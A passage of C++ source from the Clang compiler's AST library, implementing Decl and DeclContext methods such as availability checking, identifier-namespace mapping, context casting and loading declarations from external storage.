llvm::OffsetToAlignment(sizeof(Module *),
llvm::AlignOf<Decl>::Alignment);
char *Buffer = reinterpret_cast<char *>(
::operator new(ExtraAlign + sizeof(Module *) + Size + Extra, Ctx));
Buffer += ExtraAlign;
return new (Buffer) Module*(nullptr) + 1;
}
return ::operator new(Size + Extra, Ctx);
}
Module *Decl::getOwningModuleSlow() const {
assert(isFromASTFile() && "Not from AST file?");
return getASTContext().getExternalSource()->getModule(getOwningModuleID());
}
bool Decl::hasLocalOwningModuleStorage() const {
return getASTContext().getLangOpts().ModulesLocalVisibility;
}
const char *Decl::getDeclKindName() const {
switch (DeclKind) {
default: llvm_unreachable("Declaration not in DeclNodes.inc!");
#define DECL(DERIVED, BASE) case DERIVED: return #DERIVED;
#define ABSTRACT_DECL(DECL)
#include "clang/AST/DeclNodes.inc"
}
}
void Decl::setInvalidDecl(bool Invalid) {
InvalidDecl = Invalid;
assert(!isa<TagDecl>(this) || !cast<TagDecl>(this)->isCompleteDefinition());
if (Invalid && !isa<ParmVarDecl>(this)) {
// Defensive maneuver for ill-formed code: we're likely not to make it to
// a point where we set the access specifier, so default it to "public"
// to avoid triggering asserts elsewhere in the front end.
setAccess(AS_public);
}
}
const char *DeclContext::getDeclKindName() const {
switch (DeclKind) {
default: llvm_unreachable("Declaration context not in DeclNodes.inc!");
#define DECL(DERIVED, BASE) case Decl::DERIVED: return #DERIVED;
#define ABSTRACT_DECL(DECL)
#include "clang/AST/DeclNodes.inc"
}
}
bool Decl::StatisticsEnabled = false;
void Decl::EnableStatistics() {
StatisticsEnabled = true;
}
void Decl::PrintStats() {
llvm::errs() << "\n*** Decl Stats:\n";
int totalDecls = 0;
#define DECL(DERIVED, BASE) totalDecls += n##DERIVED##s;
#define ABSTRACT_DECL(DECL)
#include "clang/AST/DeclNodes.inc"
llvm::errs() << " " << totalDecls << " decls total.\n";
int totalBytes = 0;
#define DECL(DERIVED, BASE) \
if (n##DERIVED##s > 0) { \
totalBytes += (int)(n##DERIVED##s * sizeof(DERIVED##Decl)); \
llvm::errs() << " " << n##DERIVED##s << " " #DERIVED " decls, " \
<< sizeof(DERIVED##Decl) << " each (" \
<< n##DERIVED##s * sizeof(DERIVED##Decl) \
<< " bytes)\n"; \
}
#define ABSTRACT_DECL(DECL)
#include "clang/AST/DeclNodes.inc"
llvm::errs() << "Total bytes = " << totalBytes << "\n";
}
void Decl::add(Kind k) {
switch (k) {
#define DECL(DERIVED, BASE) case DERIVED: ++n##DERIVED##s; break;
#define ABSTRACT_DECL(DECL)
#include "clang/AST/DeclNodes.inc"
}
}
bool Decl::isTemplateParameterPack() const {
if (const TemplateTypeParmDecl *TTP = dyn_cast<TemplateTypeParmDecl>(this))
return TTP->isParameterPack();
if (const NonTypeTemplateParmDecl *NTTP
= dyn_cast<NonTypeTemplateParmDecl>(this))
return NTTP->isParameterPack();
if (const TemplateTemplateParmDecl *TTP
= dyn_cast<TemplateTemplateParmDecl>(this))
return TTP->isParameterPack();
return false;
}
bool Decl::isParameterPack() const {
if (const ParmVarDecl *Parm = dyn_cast<ParmVarDecl>(this))
return Parm->isParameterPack();
return isTemplateParameterPack();
}
FunctionDecl *Decl::getAsFunction() {
if (FunctionDecl *FD = dyn_cast<FunctionDecl>(this))
return FD;
if (const FunctionTemplateDecl *FTD = dyn_cast<FunctionTemplateDecl>(this))
return FTD->getTemplatedDecl();
return nullptr;
}
bool Decl::isTemplateDecl() const {
return isa<TemplateDecl>(this);
}
TemplateDecl *Decl::getDescribedTemplate() const {
if (auto *FD = dyn_cast<FunctionDecl>(this))
return FD->getDescribedFunctionTemplate();
else if (auto *RD = dyn_cast<CXXRecordDecl>(this))
return RD->getDescribedClassTemplate();
else if (auto *VD = dyn_cast<VarDecl>(this))
return VD->getDescribedVarTemplate();
return nullptr;
}
const DeclContext *Decl::getParentFunctionOrMethod() const {
for (const DeclContext *DC = getDeclContext();
DC && !DC->isTranslationUnit() && !DC->isNamespace();
DC = DC->getParent())
if (DC->isFunctionOrMethod())
return DC;
return nullptr;
}
//===----------------------------------------------------------------------===//
// PrettyStackTraceDecl Implementation
//===----------------------------------------------------------------------===//
void PrettyStackTraceDecl::print(raw_ostream &OS) const {
SourceLocation TheLoc = Loc;
if (TheLoc.isInvalid() && TheDecl)
TheLoc = TheDecl->getLocation();
if (TheLoc.isValid()) {
TheLoc.print(OS, SM);
OS << ": ";
}
OS << Message;
if (const NamedDecl *DN = dyn_cast_or_null<NamedDecl>(TheDecl)) {
OS << " '";
DN->printQualifiedName(OS);
OS << '\'';
}
OS << '\n';
}
//===----------------------------------------------------------------------===//
// Decl Implementation
//===----------------------------------------------------------------------===//
// Out-of-line virtual method providing a home for Decl.
Decl::~Decl() { }
void Decl::setDeclContext(DeclContext *DC) {
DeclCtx = DC;
}
void Decl::setLexicalDeclContext(DeclContext *DC) {
if (DC == getLexicalDeclContext())
return;
if (isInSemaDC()) {
setDeclContextsImpl(getDeclContext(), DC, getASTContext());
} else {
getMultipleDC()->LexicalDC = DC;
}
Hidden = cast<Decl>(DC)->Hidden;
}
void Decl::setDeclContextsImpl(DeclContext *SemaDC, DeclContext *LexicalDC,
ASTContext &Ctx) {
if (SemaDC == LexicalDC) {
DeclCtx = SemaDC;
} else {
Decl::MultipleDC *MDC = new (Ctx) Decl::MultipleDC();
MDC->SemanticDC = SemaDC;
MDC->LexicalDC = LexicalDC;
DeclCtx = MDC;
}
}
bool Decl::isLexicallyWithinFunctionOrMethod() const {
const DeclContext *LDC = getLexicalDeclContext();
while (true) {
if (LDC->isFunctionOrMethod())
return true;
if (!isa<TagDecl>(LDC))
return false;
LDC = LDC->getLexicalParent();
}
return false;
}
bool Decl::isInAnonymousNamespace() const {
const DeclContext *DC = getDeclContext();
do {
if (const NamespaceDecl *ND = dyn_cast<NamespaceDecl>(DC))
if (ND->isAnonymousNamespace())
return true;
} while ((DC = DC->getParent()));
return false;
}
bool Decl::isInStdNamespace() const {
return getDeclContext()->isStdNamespace();
}
TranslationUnitDecl *Decl::getTranslationUnitDecl() {
if (TranslationUnitDecl *TUD = dyn_cast<TranslationUnitDecl>(this))
return TUD;
DeclContext *DC = getDeclContext();
assert(DC && "This decl is not contained in a translation unit!");
while (!DC->isTranslationUnit()) {
DC = DC->getParent();
assert(DC && "This decl is not contained in a translation unit!");
}
return cast<TranslationUnitDecl>(DC);
}
ASTContext &Decl::getASTContext() const {
return getTranslationUnitDecl()->getASTContext();
}
ASTMutationListener *Decl::getASTMutationListener() const {
return getASTContext().getASTMutationListener();
}
unsigned Decl::getMaxAlignment() const {
if (!hasAttrs())
return 0;
unsigned Align = 0;
const AttrVec &V = getAttrs();
ASTContext &Ctx = getASTContext();
specific_attr_iterator<AlignedAttr> I(V.begin()), E(V.end());
for (; I != E; ++I)
Align = std::max(Align, I->getAlignment(Ctx));
return Align;
}
bool Decl::isUsed(bool CheckUsedAttr) const {
const Decl *CanonD = getCanonicalDecl();
if (CanonD->Used)
return true;
// Check for used attribute.
// Ask the most recent decl, since attributes accumulate in the redecl chain.
if (CheckUsedAttr && getMostRecentDecl()->hasAttr<UsedAttr>())
return true;
// The information may have not been deserialized yet. Force deserialization
// to complete the needed information.
return getMostRecentDecl()->getCanonicalDecl()->Used;
}
void Decl::markUsed(ASTContext &C) {
if (isUsed(false))
return;
if (C.getASTMutationListener())
C.getASTMutationListener()->DeclarationMarkedUsed(this);
setIsUsed();
}
bool Decl::isReferenced() const {
if (Referenced)
return true;
// Check redeclarations.
for (auto I : redecls())
if (I->Referenced)
return true;
return false;
}
bool Decl::hasDefiningAttr() const {
return hasAttr<AliasAttr>() || hasAttr<IFuncAttr>();
}
const Attr *Decl::getDefiningAttr() const {
if (AliasAttr *AA = getAttr<AliasAttr>())
return AA;
if (IFuncAttr *IFA = getAttr<IFuncAttr>())
return IFA;
return nullptr;
}
/// \brief Determine the availability of the given declaration based on
/// the target platform.
///
/// When it returns an availability result other than \c AR_Available,
/// if the \p Message parameter is non-NULL, it will be set to a
/// string describing why the entity is unavailable.
///
/// FIXME: Make these strings localizable, since they end up in
/// diagnostics.
static AvailabilityResult CheckAvailability(ASTContext &Context,
const AvailabilityAttr *A,
std::string *Message,
VersionTuple EnclosingVersion) {
if (EnclosingVersion.empty())
EnclosingVersion = Context.getTargetInfo().getPlatformMinVersion();
if (EnclosingVersion.empty())
return AR_Available;
// Check if this is an App Extension "platform", and if so chop off
// the suffix for matching with the actual platform.
StringRef ActualPlatform = A->getPlatform()->getName();
StringRef RealizedPlatform = ActualPlatform;
if (Context.getLangOpts().AppExt) {
size_t suffix = RealizedPlatform.rfind("_app_extension");
if (suffix != StringRef::npos)
RealizedPlatform = RealizedPlatform.slice(0, suffix);
}
StringRef TargetPlatform = Context.getTargetInfo().getPlatformName();
// Match the platform name.
if (RealizedPlatform != TargetPlatform)
return AR_Available;
StringRef PrettyPlatformName
= AvailabilityAttr::getPrettyPlatformName(ActualPlatform);
if (PrettyPlatformName.empty())
PrettyPlatformName = ActualPlatform;
std::string HintMessage;
if (!A->getMessage().empty()) {
HintMessage = " - ";
HintMessage += A->getMessage();
}
// Make sure that this declaration has not been marked 'unavailable'.
if (A->getUnavailable()) {
if (Message) {
Message->clear();
llvm::raw_string_ostream Out(*Message);
Out << "not available on " << PrettyPlatformName
<< HintMessage;
}
return AR_Unavailable;
}
// Make sure that this declaration has already been introduced.
if (!A->getIntroduced().empty() &&
EnclosingVersion < A->getIntroduced()) {
if (Message) {
Message->clear();
llvm::raw_string_ostream Out(*Message);
VersionTuple VTI(A->getIntroduced());
VTI.UseDotAsSeparator();
Out << "introduced in " << PrettyPlatformName << ' '
<< VTI << HintMessage;
}
return A->getStrict() ? AR_Unavailable : AR_NotYetIntroduced;
}
// Make sure that this declaration hasn't been obsoleted.
if (!A->getObsoleted().empty() && EnclosingVersion >= A->getObsoleted()) {
if (Message) {
Message->clear();
llvm::raw_string_ostream Out(*Message);
VersionTuple VTO(A->getObsoleted());
VTO.UseDotAsSeparator();
Out << "obsoleted in " << PrettyPlatformName << ' '
<< VTO << HintMessage;
}
return AR_Unavailable;
}
// Make sure that this declaration hasn't been deprecated.
if (!A->getDeprecated().empty() && EnclosingVersion >= A->getDeprecated()) {
if (Message) {
Message->clear();
llvm::raw_string_ostream Out(*Message);
VersionTuple VTD(A->getDeprecated());
VTD.UseDotAsSeparator();
Out << "first deprecated in " << PrettyPlatformName << ' '
<< VTD << HintMessage;
}
return AR_Deprecated;
}
return AR_Available;
}
AvailabilityResult Decl::getAvailability(std::string *Message,
VersionTuple EnclosingVersion) const {
if (auto *FTD = dyn_cast<FunctionTemplateDecl>(this))
return FTD->getTemplatedDecl()->getAvailability(Message, EnclosingVersion);
AvailabilityResult Result = AR_Available;
std::string ResultMessage;
for (const auto *A : attrs()) {
if (const auto *Deprecated = dyn_cast<DeprecatedAttr>(A)) {
if (Result >= AR_Deprecated)
continue;
if (Message)
ResultMessage = Deprecated->getMessage();
Result = AR_Deprecated;
continue;
}
if (const auto *Unavailable = dyn_cast<UnavailableAttr>(A)) {
if (Message)
*Message = Unavailable->getMessage();
return AR_Unavailable;
}
if (const auto *Availability = dyn_cast<AvailabilityAttr>(A)) {
AvailabilityResult AR = CheckAvailability(getASTContext(), Availability,
Message, EnclosingVersion);
if (AR == AR_Unavailable)
return AR_Unavailable;
if (AR > Result) {
Result = AR;
if (Message)
ResultMessage.swap(*Message);
}
continue;
}
}
if (Message)
Message->swap(ResultMessage);
return Result;
}
bool Decl::canBeWeakImported(bool &IsDefinition) const {
IsDefinition = false;
// Variables, if they aren't definitions.
if (const VarDecl *Var = dyn_cast<VarDecl>(this)) {
if (Var->isThisDeclarationADefinition()) {
IsDefinition = true;
return false;
}
return true;
// Functions, if they aren't definitions.
} else if (const FunctionDecl *FD = dyn_cast<FunctionDecl>(this)) {
if (FD->hasBody()) {
IsDefinition = true;
return false;
}
return true;
// Objective-C classes, if this is the non-fragile runtime.
} else if (isa<ObjCInterfaceDecl>(this) &&
getASTContext().getLangOpts().ObjCRuntime.hasWeakClassImport()) {
return true;
// Nothing else.
} else {
return false;
}
}
bool Decl::isWeakImported() const {
bool IsDefinition;
if (!canBeWeakImported(IsDefinition))
return false;
for (const auto *A : attrs()) {
if (isa<WeakImportAttr>(A))
return true;
if (const auto *Availability = dyn_cast<AvailabilityAttr>(A)) {
if (CheckAvailability(getASTContext(), Availability, nullptr,
VersionTuple()) == AR_NotYetIntroduced)
return true;
}
}
return false;
}
unsigned Decl::getIdentifierNamespaceForKind(Kind DeclKind) {
switch (DeclKind) {
case Function:
case CXXMethod:
case CXXConstructor:
case ConstructorUsingShadow:
case CXXDestructor:
case CXXConversion:
case EnumConstant:
case Var:
case Binding:
case ImplicitParam:
case ParmVar:
case ObjCMethod:
case ObjCProperty:
case MSProperty:
return IDNS_Ordinary;
case Label:
return IDNS_Label;
case IndirectField:
return IDNS_Ordinary | IDNS_Member;
case NonTypeTemplateParm:
// Non-type template parameters are not found by lookups that ignore
// non-types, but they are found by redeclaration lookups for tag types,
// so we include them in the tag namespace.
return IDNS_Ordinary | IDNS_Tag;
case ObjCCompatibleAlias:
case ObjCInterface:
return IDNS_Ordinary | IDNS_Type;
case Typedef:
case TypeAlias:
case TypeAliasTemplate:
case UnresolvedUsingTypename:
case TemplateTypeParm:
case ObjCTypeParam:
return IDNS_Ordinary | IDNS_Type;
case UsingShadow:
return 0; // we'll actually overwrite this later
case UnresolvedUsingValue:
return IDNS_Ordinary | IDNS_Using;
case Using:
return IDNS_Using;
case ObjCProtocol:
return IDNS_ObjCProtocol;
case Field:
case ObjCAtDefsField:
case ObjCIvar:
return IDNS_Member;
case Record:
case CXXRecord:
case Enum:
return IDNS_Tag | IDNS_Type;
case Namespace:
case NamespaceAlias:
return IDNS_Namespace;
case FunctionTemplate:
case VarTemplate:
return IDNS_Ordinary;
case ClassTemplate:
case TemplateTemplateParm:
return IDNS_Ordinary | IDNS_Tag | IDNS_Type;
case OMPDeclareReduction:
return IDNS_OMPReduction;
// Never have names.
case Friend:
case FriendTemplate:
case AccessSpec:
case LinkageSpec:
case FileScopeAsm:
case StaticAssert:
case ObjCPropertyImpl:
case PragmaComment:
case PragmaDetectMismatch:
case Block:
case Captured:
case TranslationUnit:
case ExternCContext:
case Decomposition:
case UsingDirective:
case BuiltinTemplate:
case ClassTemplateSpecialization:
case ClassTemplatePartialSpecialization:
case ClassScopeFunctionSpecialization:
case VarTemplateSpecialization:
case VarTemplatePartialSpecialization:
case ObjCImplementation:
case ObjCCategory:
case ObjCCategoryImpl:
case Import:
case OMPThreadPrivate:
case OMPCapturedExpr:
case Empty:
// Never looked up by name.
return 0;
}
llvm_unreachable("Invalid DeclKind!");
}
void Decl::setAttrsImpl(const AttrVec &attrs, ASTContext &Ctx) {
assert(!HasAttrs && "Decl already contains attrs.");
AttrVec &AttrBlank = Ctx.getDeclAttrs(this);
assert(AttrBlank.empty() && "HasAttrs was wrong?");
AttrBlank = attrs;
HasAttrs = true;
}
void Decl::dropAttrs() {
if (!HasAttrs) return;
HasAttrs = false;
getASTContext().eraseDeclAttrs(this);
}
const AttrVec &Decl::getAttrs() const {
assert(HasAttrs && "No attrs to get!");
return getASTContext().getDeclAttrs(this);
}
Decl *Decl::castFromDeclContext (const DeclContext *D) {
Decl::Kind DK = D->getDeclKind();
switch(DK) {
#define DECL(NAME, BASE)
#define DECL_CONTEXT(NAME) \
case Decl::NAME: \
return static_cast<NAME##Decl*>(const_cast<DeclContext*>(D));
#define DECL_CONTEXT_BASE(NAME)
#include "clang/AST/DeclNodes.inc"
default:
#define DECL(NAME, BASE)
#define DECL_CONTEXT_BASE(NAME) \
if (DK >= first##NAME && DK <= last##NAME) \
return static_cast<NAME##Decl*>(const_cast<DeclContext*>(D));
#include "clang/AST/DeclNodes.inc"
llvm_unreachable("a decl that inherits DeclContext isn't handled");
}
}
DeclContext *Decl::castToDeclContext(const Decl *D) {
Decl::Kind DK = D->getKind();
switch(DK) {
#define DECL(NAME, BASE)
#define DECL_CONTEXT(NAME) \
case Decl::NAME: \
return static_cast<NAME##Decl*>(const_cast<Decl*>(D));
#define DECL_CONTEXT_BASE(NAME)
#include "clang/AST/DeclNodes.inc"
default:
#define DECL(NAME, BASE)
#define DECL_CONTEXT_BASE(NAME) \
if (DK >= first##NAME && DK <= last##NAME) \
return static_cast<NAME##Decl*>(const_cast<Decl*>(D));
#include "clang/AST/DeclNodes.inc"
llvm_unreachable("a decl that inherits DeclContext isn't handled");
}
}
SourceLocation Decl::getBodyRBrace() const {
// Special handling of FunctionDecl to avoid de-serializing the body from PCH.
// FunctionDecl stores EndRangeLoc for this purpose.
if (const FunctionDecl *FD = dyn_cast<FunctionDecl>(this)) {
const FunctionDecl *Definition;
if (FD->hasBody(Definition))
return Definition->getSourceRange().getEnd();
return SourceLocation();
}
if (Stmt *Body = getBody())
return Body->getSourceRange().getEnd();
return SourceLocation();
}
bool Decl::AccessDeclContextSanity() const {
#ifndef NDEBUG
// Suppress this check if any of the following hold:
// 1. this is the translation unit (and thus has no parent)
// 2. this is a template parameter (and thus doesn't belong to its context)
// 3. this is a non-type template parameter
// 4. the context is not a record
// 5. it's invalid
// 6. it's a C++0x static_assert.
if (isa<TranslationUnitDecl>(this) ||
isa<TemplateTypeParmDecl>(this) ||
isa<NonTypeTemplateParmDecl>(this) ||
!isa<CXXRecordDecl>(getDeclContext()) ||
isInvalidDecl() ||
isa<StaticAssertDecl>(this) ||
// FIXME: a ParmVarDecl can have ClassTemplateSpecialization
// as DeclContext (?).
isa<ParmVarDecl>(this) ||
// FIXME: a ClassTemplateSpecialization or CXXRecordDecl can have
// AS_none as access specifier.
isa<CXXRecordDecl>(this) ||
isa<ClassScopeFunctionSpecializationDecl>(this))
return true;
assert(Access != AS_none &&
"Access specifier is AS_none inside a record decl");
#endif
return true;
}
static Decl::Kind getKind(const Decl *D) { return D->getKind(); }
static Decl::Kind getKind(const DeclContext *DC) { return DC->getDeclKind(); }
const FunctionType *Decl::getFunctionType(bool BlocksToo) const {
QualType Ty;
if (const ValueDecl *D = dyn_cast<ValueDecl>(this))
Ty = D->getType();
else if (const TypedefNameDecl *D = dyn_cast<TypedefNameDecl>(this))
Ty = D->getUnderlyingType();
else
return nullptr;
if (Ty->isFunctionPointerType())
Ty = Ty->getAs<PointerType>()->getPointeeType();
else if (BlocksToo && Ty->isBlockPointerType())
Ty = Ty->getAs<BlockPointerType>()->getPointeeType();
return Ty->getAs<FunctionType>();
}
/// Starting at a given context (a Decl or DeclContext), look for a
/// code context that is not a closure (a lambda, block, etc.).
template <class T> static Decl *getNonClosureContext(T *D) {
if (getKind(D) == Decl::CXXMethod) {
CXXMethodDecl *MD = cast<CXXMethodDecl>(D);
if (MD->getOverloadedOperator() == OO_Call &&
MD->getParent()->isLambda())
return getNonClosureContext(MD->getParent()->getParent());
return MD;
} else if (FunctionDecl *FD = dyn_cast<FunctionDecl>(D)) {
return FD;
} else if (ObjCMethodDecl *MD = dyn_cast<ObjCMethodDecl>(D)) {
return MD;
} else if (BlockDecl *BD = dyn_cast<BlockDecl>(D)) {
return getNonClosureContext(BD->getParent());
} else if (CapturedDecl *CD = dyn_cast<CapturedDecl>(D)) {
return getNonClosureContext(CD->getParent());
} else {
return nullptr;
}
}
Decl *Decl::getNonClosureContext() {
return ::getNonClosureContext(this);
}
Decl *DeclContext::getNonClosureAncestor() {
return ::getNonClosureContext(this);
}
//===----------------------------------------------------------------------===//
// DeclContext Implementation
//===----------------------------------------------------------------------===//
bool DeclContext::classof(const Decl *D) {
switch (D->getKind()) {
#define DECL(NAME, BASE)
#define DECL_CONTEXT(NAME) case Decl::NAME:
#define DECL_CONTEXT_BASE(NAME)
#include "clang/AST/DeclNodes.inc"
return true;
default:
#define DECL(NAME, BASE)
#define DECL_CONTEXT_BASE(NAME) \
if (D->getKind() >= Decl::first##NAME && \
D->getKind() <= Decl::last##NAME) \
return true;
#include "clang/AST/DeclNodes.inc"
return false;
}
}
DeclContext::~DeclContext() { }
/// \brief Find the parent context of this context that will be
/// used for unqualified name lookup.
///
/// Generally, the parent lookup context is the semantic context. However, for
/// a friend function the parent lookup context is the lexical context, which
/// is the class in which the friend is declared.
DeclContext *DeclContext::getLookupParent() {
// FIXME: Find a better way to identify friends
if (isa<FunctionDecl>(this))
if (getParent()->getRedeclContext()->isFileContext() &&
getLexicalParent()->getRedeclContext()->isRecord())
return getLexicalParent();
return getParent();
}
bool DeclContext::isInlineNamespace() const {
return isNamespace() &&
cast<NamespaceDecl>(this)->isInline();
}
bool DeclContext::isStdNamespace() const {
if (!isNamespace())
return false;
const NamespaceDecl *ND = cast<NamespaceDecl>(this);
if (ND->isInline()) {
return ND->getParent()->isStdNamespace();
}
if (!getParent()->getRedeclContext()->isTranslationUnit())
return false;
const IdentifierInfo *II = ND->getIdentifier();
return II && II->isStr("std");
}
bool DeclContext::isDependentContext() const {
if (isFileContext())
return false;
if (isa<ClassTemplatePartialSpecializationDecl>(this))
return true;
if (const CXXRecordDecl *Record = dyn_cast<CXXRecordDecl>(this)) {
if (Record->getDescribedClassTemplate())
return true;
if (Record->isDependentLambda())
return true;
}
if (const FunctionDecl *Function = dyn_cast<FunctionDecl>(this)) {
if (Function->getDescribedFunctionTemplate())
return true;
// Friend function declarations are dependent if their *lexical*
// context is dependent.
if (cast<Decl>(this)->getFriendObjectKind())
return getLexicalParent()->isDependentContext();
}
// FIXME: A variable template is a dependent context, but is not a
// DeclContext. A context within it (such as a lambda-expression)
// should be considered dependent.
return getParent() && getParent()->isDependentContext();
}
bool DeclContext::isTransparentContext() const {
if (DeclKind == Decl::Enum)
return !cast<EnumDecl>(this)->isScoped();
else if (DeclKind == Decl::LinkageSpec)
return true;
return false;
}
static bool isLinkageSpecContext(const DeclContext *DC,
LinkageSpecDecl::LanguageIDs ID) {
while (DC->getDeclKind() != Decl::TranslationUnit) {
if (DC->getDeclKind() == Decl::LinkageSpec)
return cast<LinkageSpecDecl>(DC)->getLanguage() == ID;
DC = DC->getLexicalParent();
}
return false;
}
bool DeclContext::isExternCContext() const {
return isLinkageSpecContext(this, clang::LinkageSpecDecl::lang_c);
}
const LinkageSpecDecl *DeclContext::getExternCContext() const {
const DeclContext *DC = this;
while (DC->getDeclKind() != Decl::TranslationUnit) {
if (DC->getDeclKind() == Decl::LinkageSpec &&
cast<LinkageSpecDecl>(DC)->getLanguage() ==
clang::LinkageSpecDecl::lang_c)
return cast<LinkageSpecDecl>(DC);
DC = DC->getLexicalParent();
}
return nullptr;
}
bool DeclContext::isExternCXXContext() const {
return isLinkageSpecContext(this, clang::LinkageSpecDecl::lang_cxx);
}
bool DeclContext::Encloses(const DeclContext *DC) const {
if (getPrimaryContext() != this)
return getPrimaryContext()->Encloses(DC);
for (; DC; DC = DC->getParent())
if (DC->getPrimaryContext() == this)
return true;
return false;
}
DeclContext *DeclContext::getPrimaryContext() {
switch (DeclKind) {
case Decl::TranslationUnit:
case Decl::ExternCContext:
case Decl::LinkageSpec:
case Decl::Block:
case Decl::Captured:
case Decl::OMPDeclareReduction:
// There is only one DeclContext for these entities.
return this;
case Decl::Namespace:
// The original namespace is our primary context.
return static_cast<NamespaceDecl*>(this)->getOriginalNamespace();
case Decl::ObjCMethod:
return this;
case Decl::ObjCInterface:
if (ObjCInterfaceDecl *Def = cast<ObjCInterfaceDecl>(this)->getDefinition())
return Def;
return this;
case Decl::ObjCProtocol:
if (ObjCProtocolDecl *Def = cast<ObjCProtocolDecl>(this)->getDefinition())
return Def;
return this;
case Decl::ObjCCategory:
return this;
case Decl::ObjCImplementation:
case Decl::ObjCCategoryImpl:
return this;
default:
if (DeclKind >= Decl::firstTag && DeclKind <= Decl::lastTag) {
// If this is a tag type that has a definition or is currently
// being defined, that definition is our primary context.
TagDecl *Tag = cast<TagDecl>(this);
if (TagDecl *Def = Tag->getDefinition())
return Def;
if (const TagType *TagTy = dyn_cast<TagType>(Tag->getTypeForDecl())) {
// Note, TagType::getDecl returns the (partial) definition if one exists.
TagDecl *PossiblePartialDef = TagTy->getDecl();
if (PossiblePartialDef->isBeingDefined())
return PossiblePartialDef;
} else {
assert(isa<InjectedClassNameType>(Tag->getTypeForDecl()));
}
return Tag;
}
assert(DeclKind >= Decl::firstFunction && DeclKind <= Decl::lastFunction &&
"Unknown DeclContext kind");
return this;
}
}
void
DeclContext::collectAllContexts(SmallVectorImpl<DeclContext *> &Contexts){
Contexts.clear();
if (DeclKind != Decl::Namespace) {
Contexts.push_back(this);
return;
}
NamespaceDecl *Self = static_cast<NamespaceDecl *>(this);
for (NamespaceDecl *N = Self->getMostRecentDecl(); N;
N = N->getPreviousDecl())
Contexts.push_back(N);
std::reverse(Contexts.begin(), Contexts.end());
}
std::pair<Decl *, Decl *>
DeclContext::BuildDeclChain(ArrayRef<Decl*> Decls,
bool FieldsAlreadyLoaded) {
// Build up a chain of declarations via the Decl::NextInContextAndBits field.
Decl *FirstNewDecl = nullptr;
Decl *PrevDecl = nullptr;
for (unsigned I = 0, N = Decls.size(); I != N; ++I) {
if (FieldsAlreadyLoaded && isa<FieldDecl>(Decls[I]))
continue;
Decl *D = Decls[I];
if (PrevDecl)
PrevDecl->NextInContextAndBits.setPointer(D);
else
FirstNewDecl = D;
PrevDecl = D;
}
return std::make_pair(FirstNewDecl, PrevDecl);
}
/// \brief We have just acquired external visible storage, and we already have
/// built a lookup map. For every name in the map, pull in the new names from
/// the external storage.
void DeclContext::reconcileExternalVisibleStorage() const {
assert(NeedToReconcileExternalVisibleStorage && LookupPtr);
NeedToReconcileExternalVisibleStorage = false;
for (auto &Lookup : *LookupPtr)
Lookup.second.setHasExternalDecls();
}
/// \brief Load the declarations within this lexical storage from an
/// external source.
/// \return \c true if any declarations were added.
bool
DeclContext::LoadLexicalDeclsFromExternalStorage() const {
ExternalASTSource *Source = getParentASTContext().getExternalSource();
assert(hasExternalLexicalStorage() && Source && "No external storage?");
// Notify that we have a DeclContext that is initializing.
ExternalASTSource::Deserializing ADeclContext(Source);
// Load the external declarations, if any.
SmallVector<Decl*, 64> Decls;
ExternalLexicalStorage = false;
Source->FindExternalLexicalDecls(this, Decls);
if (Decls.empty())
return false;
// We may have already loaded just the fields of this record, in which case
// we need to ignore them.
bool FieldsAlreadyLoaded = false;
if (const RecordDecl *RD = dyn_cast<RecordDecl>(this))
FieldsAlreadyLoaded = RD->LoadedFieldsFromExternalStorage;
// Splice the newly-read declarations into the beginning of the list
// of declarations.
Decl *ExternalFirst, *ExternalLast;
std::tie(ExternalFirst, ExternalLast) =
BuildDeclChain(Decls, FieldsAlreadyLoaded);
ExternalLast->NextInContextAndBits.setPointer(FirstDecl);
FirstDecl = ExternalFirst;
if (!LastDecl)
LastDecl = ExternalLast;
return true;
}
DeclContext::lookup_result
ExternalASTSource::SetNoExternalVisibleDeclsForName(const DeclContext *DC,
DeclarationName Name) {
ASTContext &Context = DC->getParentASTContext();
StoredDeclsMap *Map;
if (!(Map = DC->LookupPtr))
Map = DC->CreateStoredDeclsMap(Context);
if (DC->NeedToReconcileExternalVisibleStorage)
DC->reconcileExternalVisibleStorage();
(*Map)[Name].removeExternalDecls();
return DeclContext::lookup_result();
}
DeclContext::lookup_result
ExternalASTSource::SetExternalVisibleDeclsForName(const DeclContext *DC,
DeclarationName Name,
ArrayRef<NamedDecl*> Decls) {
ASTContext &Context = DC->getParentASTContext();
StoredDeclsMap *Map;
if (!(Map = DC->LookupPtr))
Map = DC->CreateStoredDeclsMap(Context);
if (DC->NeedToReconcileExternalVisibleStorage)
DC->reconcileExternalVisibleStorage();
StoredDeclsList &List = (*Map)[Name];
// Clear out any old external visible declarations, to avoid quadratic
// performance in the redeclaration checks below.
List.removeExternalDecls();
if (!List.isNull()) {
// We have both existing declarations and new declarations for this name.
// Some of the declarations may simply replace existing ones. Handle those
// first.
llvm::SmallVector<unsigned, 8> Skip;
for (unsigned I = 0, N = Decls.size(); I != N; ++I)
if (List.HandleRedeclaration(Decls[I], /*IsKnownNewer*/false))
Skip.push_back(I);
Skip.push_back(Decls.size());
// Add in any new declarations.
unsigned SkipPos = 0;
for (unsigned I = 0, N = Decls.size(); I != N; ++I) {
if (I == Skip[SkipPos])
++SkipPos;
else
List.AddSubsequentDecl(Decls[I]);
}
} else {
// Convert the array to a StoredDeclsList.
for (ArrayRef<NamedDecl*>::iterator
I = Decls.begin(), E = Decls.end(); I != E; ++I) {
if (List.isNull())
List.setOnlyValue(*I);
else
List.AddSubsequentDecl(*I);
}
}
return List.getLookupResult();
}
DeclContext::decl_iterator DeclContext::decls_begin() const {
if (hasExternalLexicalStorage())
LoadLexicalDeclsFromExternalStorage();
return decl_iterator(FirstDecl);
}
bool DeclContext::decls_empty() const {
if (hasExternalLexicalStorage())
LoadLexicalDeclsFromExternalStorage();
return !FirstDecl;
}
bool DeclContext::containsDecl(Decl *D) const {
return (D->getLexicalDeclContext() == this &&
(D->NextInContextAndBits.getPointer() || D == LastDecl));
}
void DeclContext::removeDecl(Decl *D) {
assert(D->getLexicalDeclContext() == this &&
"decl being removed from non-lexical context");
assert((D->NextInContextAndBits.getPointer() || D == LastDecl) &&
"decl is not in decls list");
// Remove D from the decl chain. This is O(n) but hopefully rare.
if (D == FirstDecl) {
if (D == LastDecl)
FirstDecl = LastDecl = nullptr;
else
FirstDecl = D->NextInContextAndBits.getPointer();
} else {
for (Decl *I = FirstDecl; true; I = I->NextInContextAndBits.getPointer()) {
assert(I && "decl not found in linked list");
if (I->NextInContextAndBits.getPointer() == D) {
I->NextInContextAndBits.setPointer(D->NextInContextAndBits.getPointer());
if (D == LastDecl) LastDecl = I;
break;
}
}
}
// Mark that D is no longer in the decl chain.
